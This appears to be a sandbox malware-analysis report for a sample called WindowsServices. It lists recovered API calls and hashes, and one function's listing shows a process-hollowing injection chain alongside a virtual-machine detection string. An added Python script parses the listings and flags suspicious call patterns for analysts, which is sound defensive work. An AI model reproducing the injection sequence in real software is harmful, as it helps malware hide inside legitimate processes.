401f51 CopyRect 2845->2846 2847 4039c0 3 API calls 2846->2847 2848 401f71 CopyRect 2847->2848 2849 404670 3 API calls 2848->2849 2850 401f91 CopyRect 2849->2850 2851 4039c0 3 API calls 2850->2851 2852 401fb1 CopyRect 2851->2852 2853 404670 3 API calls 2852->2853 2854 401fd1 CopyRect 2853->2854 2855 4039c0 3 API calls 2854->2855 2856 401ff1 CopyRect 2855->2856 2857 404670 3 API calls 2856->2857 2858 402011 CopyRect 2857->2858 2859 4039c0 3 API calls 2858->2859 2860 402031 CopyRect 2859->2860 2861 404670 3 API calls 2860->2861 2862 402051 CopyRect 2861->2862 2863 4039c0 3 API calls 2862->2863 2864 402071 CopyRect 2863->2864 2865 404670 3 API calls 2864->2865 2866 402091 CopyRect 2865->2866 2867 4039c0 3 API calls 2866->2867 2868 4020b1 CopyRect 2867->2868 2869 404670 3 API calls 2868->2869 2870 4020d1 CopyRect 2869->2870 2871 4039c0 3 API calls 2870->2871 2872 4020f1 CopyRect 2871->2872 2873 404670 3 API calls 2872->2873 2874 402111 CopyRect 2873->2874 2875 4039c0 3 API calls 2874->2875 2876 402131 CopyRect 2875->2876 2877 404670 3 API calls 2876->2877 2878 402151 CopyRect 2877->2878 2879 4039c0 3 API calls 2878->2879 2880 402171 CopyRect 2879->2880 2881 404670 3 API calls 2880->2881 2882 402191 CopyRect 2881->2882 2883 4039c0 3 API calls 2882->2883 2884 4021b1 CopyRect 2883->2884 2885 4039c0 3 API calls 2884->2885 2886 4021d1 CopyRect 2885->2886 2949 4040f0 2886->2949 2888 4021f1 CopyRect 2889 4039c0 3 API calls 2888->2889 2890 402211 CopyRect 2889->2890 2891 4040f0 3 API calls 2890->2891 2892 402231 CopyRect 2891->2892 2893 4039c0 3 API calls 2892->2893 2894 402251 CopyRect 2893->2894 2895 4040f0 3 API calls 2894->2895 2896 402271 CopyRect 2895->2896 2897 4040f0 3 API calls 2896->2897 2898 402291 CopyRect 2897->2898 2899 4039c0 3 API calls 2898->2899 2900 4022b1 CopyRect 2899->2900 2901 4040f0 3 API calls 2900->2901 2902 4022d1 CopyRect 2901->2902 2903 4039c0 3 API calls 2902->2903 2904 4022f1 CopyRect 2903->2904 2905 4040f0 3 API calls 2904->2905 2906 402311 
CopyRect 2905->2906 2907 4039c0 3 API calls 2906->2907 2908 402331 CopyRect 2907->2908 2909 4040f0 3 API calls 2908->2909 2910 402351 CopyRect 2909->2910 2911 4040f0 3 API calls 2910->2911 2912 402371 CopyRect 2911->2912 2913 4040f0 3 API calls 2912->2913 2914 402391 CopyRect 2913->2914 2915 4039c0 3 API calls 2914->2915 2916 4023b1 CopyRect 2915->2916 2917 4039c0 3 API calls 2916->2917 2918 4023d1 CopyRect 2917->2918 2919 4040f0 3 API calls 2918->2919 2920 4023f1 CopyRect 2919->2920 2921 4039c0 3 API calls 2920->2921 2922 402411 CopyRect 2921->2922 2923 4039c0 3 API calls 2922->2923 2924 402431 CopyRect 2923->2924 2925 4040f0 3 API calls 2924->2925 2926 402451 CopyRect 2925->2926 2927 4040f0 3 API calls 2926->2927 2928 402471 CopyRect 2927->2928 2929 4039c0 3 API calls 2928->2929 2930 402491 CopyRect 2929->2930 2931 4040f0 3 API calls 2930->2931 2932 4024b1 CopyRect 2931->2932 2933 4040f0 3 API calls 2932->2933 2934 4024d1 CopyRect 2933->2934 2935 4040f0 3 API calls 2934->2935 2936 4024f1 2935->2936 2936->2599 2938 4039f4 2937->2938 2939 403b03 _ftol _ftol 2938->2939 2940 403b5e 2938->2940 2942 403bac 2938->2942 2939->2939 2939->2940 2941 403b90 Polygon 2940->2941 2941->2942 2942->2608 2944 4046a5 2943->2944 2945 404776 _ftol _ftol 2944->2945 2946 4047d8 2944->2946 2948 404805 2944->2948 2945->2945 2945->2946 2947 4047eb Polyline 2946->2947 2947->2948 2948->2610 2950 40412b 2949->2950 2951 40423e _ftol _ftol 2950->2951 2952 404299 2950->2952 2954 4042ed 2950->2954 2951->2951 2951->2952 2953 4042c9 PolyPolygon 2952->2953 2953->2954 2954->2888 3604 40ada0 EnableWindow 3605 40a7a0 GetWindowRect 3606 40a7c1 3605->3606 3607 404ec0 24 API calls 3606->3607 3608 40a7e1 SetCapture 3607->3608 3609 40a7f4 3608->3609 2582 40b261 _exit 3047 40b2e3 3048 40b2e8 3047->3048 3051 40b2ba 3048->3051 3052 40b2bf 3051->3052 3053 40b2d4 _setmbcp 3052->3053 3054 40b2dd 3052->3054 3053->3054 2334 405830 2337 40a1b0 2334->2337 2336 405856 2338 40a1d9 2337->2338 2339 40a1fd LoadIconA 
2338->2339 2339->2336 2955 40ac30 RectVisible 3477 40acb0 TabbedTextOutA 3580 40a170 3583 40a090 3580->3583 3582 40a178 3584 40a0c8 BitBlt 3583->3584 3586 40a105 3583->3586 3584->3586 3586->3582 3587 40ad70 Escape 3589 40ad30 3590 40ad38 3589->3590 3591 40ad3b GrayStringA 3589->3591 3590->3591 3592 4057f0 3593 4057f5 3592->3593 3596 40b0c8 3593->3596 3599 40b09c 3596->3599 3598 40581a 3600 40b0b1 __dllonexit 3599->3600 3601 40b0a5 _onexit 3599->3601 3600->3598 3601->3598
APIs
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
• GetProcAddress.KERNEL32(00000000), ref: 004074EA
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
• GetProcAddress.KERNEL32(00000000), ref: 00407500
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
• LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
• LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
• LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
• LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
• LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
• LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
• LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
• LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
• LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
• LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
• LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
• LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
• wcscpy.MSVCRT ref: 00407B17
• wcscpy.MSVCRT ref: 00407F50
• wcscat.MSVCRT ref: 00407F7A
• wcscpy.MSVCRT ref: 00407F8A
• wcscat.MSVCRT ref: 00407F9E
• wcscat.MSVCRT ref: 00408144
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
• Wow64GetThreadContext.KERNEL32 ref: 004081A2
• NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
• VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
• VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
• WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
• WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
• WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
• WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
• WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
• Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
• Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
• wcscpy.MSVCRT ref: 00408760
• wcscat.MSVCRT ref: 00408774
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
• CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
• ResumeThread.KERNELBASE(?), ref: 004087FC
• Sleep.KERNELBASE(00000002), ref: 00408815
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
• Module32First.KERNEL32(00000000,00000000), ref: 004088AC
• strstr.MSVCRT ref: 004088D6
• Wow64SuspendThread.KERNEL32(?), ref: 00408904
• Wow64SuspendThread.KERNEL32(?), ref: 0040891F
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
• DeleteFileW.KERNELBASE(?), ref: 00408930
• ResumeThread.KERNELBASE(?), ref: 00408949
• Sleep.KERNELBASE(00000002), ref: 0040894D
• DeleteFileW.KERNELBASE(?), ref: 00408956
• Wow64SuspendThread.KERNEL32(?), ref: 0040897B
• Sleep.KERNELBASE(00000005), ref: 0040898A
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
• wcscat.MSVCRT ref: 00408A5B
• wcsstr.MSVCRT ref: 00408A82
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
• TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
• CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
• Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
• Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
• strstr.MSVCRT ref: 00408E02
• strstr.MSVCRT ref: 00408E16
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
• CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
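The API sequence listed for this function (a module snapshot and then a process snapshot walked with strstr, DeleteFileW and MoveFileExW sandwiched between Wow64SuspendThread and ResumeThread, two VirtualAlloc calls with protection 00000040, and CreateProcessA followed by Sleep and TerminateProcess) is the kind of listing an analyst triages by hand before opening the function in a disassembler. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses bullet lines in this report's format, decodes the Win32 constants that appear as literal arguments, and flags the call sequences worth reversing first. SAMPLE is a constructed subset of the lines above; the Call record, the rule names and the six-call window are this example's own assumptions.

```python
# Added example (not part of the Joe Sandbox report): parse the bullet lines of an
# 'APIs' listing, decode the Win32 constants that appear as literal arguments, and
# flag call sequences worth reversing first. SAMPLE is a constructed subset of the
# lines above; rule names and the six-call window are this example's own choices.
import re
from dataclasses import dataclass, field

SAMPLE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
• Module32First.KERNEL32(00000000,00000000), ref: 004088AC
• strstr.MSVCRT ref: 004088D6
• Wow64SuspendThread.KERNEL32(?), ref: 00408904
• DeleteFileW.KERNELBASE(?), ref: 00408930
• ResumeThread.KERNELBASE(?), ref: 00408949
• DeleteFileW.KERNELBASE(?), ref: 00408956
• Wow64SuspendThread.KERNEL32(?), ref: 0040897B
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
• TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
• CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
• Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
• Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
• strstr.MSVCRT ref: 00408E02
• VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
• ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
• VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
• Sleep.KERNELBASE(00000320), ref: 004099F6
• TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
"""

LINE_RE = re.compile(
    r"(?:•|\*)?\s*(?P<api>[\w@]+)\.(?P<mod>\w+)"  # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                  # optional (arg,...)
    r"\s*,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]{8})"   # ref: ADDR
)

# Win32 constants needed to read the literal arguments in this listing.
PAGE_EXECUTE_READWRITE, MEM_COMMIT_RESERVE, CREATE_SUSPENDED = 0x40, 0x3000, 0x4
TH32CS = {0x2: "TH32CS_SNAPPROCESS", 0x8: "TH32CS_SNAPMODULE"}
MOVEFILE = {0x4: "MOVEFILE_DELAY_UNTIL_REBOOT", 0x8: "MOVEFILE_WRITE_THROUGH"}
ENUMERATORS = {"Process32First", "Process32Next", "Module32First", "Module32Next"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    addr: int
    notes: list = field(default_factory=list)


def parse_calls(text):
    """Turn bullet lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["mod"], args, int(m["addr"], 16)))
    return calls


def _hexarg(args, i):
    """args[i] as an int, or None when the sandbox could not recover it ('?')."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def annotate(calls):
    """Decode constants only for APIs whose prototype is known here: the sandbox
    reads arguments off the stack, so stray values on other lines are ignored."""
    for c in calls:
        if c.api in ("VirtualAlloc", "VirtualAllocEx"):   # ..., flAllocationType, flProtect
            if _hexarg(c.args, -2) == MEM_COMMIT_RESERVE:
                c.notes.append("MEM_COMMIT|MEM_RESERVE")
            if _hexarg(c.args, -1) == PAGE_EXECUTE_READWRITE:
                c.notes.append("PAGE_EXECUTE_READWRITE")
        elif c.api == "CreateToolhelp32Snapshot" and _hexarg(c.args, 0) in TH32CS:
            c.notes.append(TH32CS[_hexarg(c.args, 0)])
        elif c.api == "MoveFileExW":                       # lpExisting, lpNew, dwFlags
            flags = _hexarg(c.args, 2) or 0
            c.notes += [name for bit, name in MOVEFILE.items() if flags & bit]
        elif c.api in ("CreateProcessA", "CreateProcessW"):  # dwCreationFlags is arg 5
            flags = _hexarg(c.args, 5)
            if flags is not None:
                c.notes.append("CREATE_SUSPENDED" if flags & CREATE_SUSPENDED
                               else "dwCreationFlags=%#x (not suspended)" % flags)
    return calls


def find_patterns(calls, window=6):
    """Flag call sequences; each finding is (rule, address of the first call)."""
    apis = [c.api for c in calls]
    findings = []
    for i, c in enumerate(calls):
        nxt = set(apis[i + 1:i + 1 + window])
        if c.api == "CreateToolhelp32Snapshot" and nxt & ENUMERATORS and "strstr" in nxt:
            findings.append(("toolhelp-enumeration-name-match", c.addr))
        elif c.api == "DeleteFileW" and "MoveFileExW" in nxt:
            findings.append(("file-replace-after-delete", c.addr))
        elif c.api in ("VirtualAlloc", "VirtualAllocEx") and _hexarg(c.args, -1) == PAGE_EXECUTE_READWRITE:
            findings.append(("rwx-allocation", c.addr))
        elif c.api in ("CreateProcessA", "CreateProcessW") and "TerminateProcess" in nxt:
            findings.append(("spawn-then-kill", c.addr))
    return findings
```

Run `find_patterns(annotate(parse_calls(SAMPLE)))` to get the seven findings: both Toolhelp walks with a strstr name match, the file replacement after DeleteFileW, the two RWX allocations and the spawn-then-kill at 004099EB. The ResumeThread line at 004089B3 carries the arguments 00003000,00000040 of a neighbouring call; that is why the decoder reads constants only for APIs whose prototype it knows. When deciding where to start in the disassembler, read these findings together with the function's string list, which includes NtUnmapVi, VirtualAllocEx, Writ, IsWow64Proc and VBoxS.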

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 409 40b2a2-40b2b7 69CE4ED0
                                                                        APIs
                                                                        • 69CE4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040A5A2
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040A5DF
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
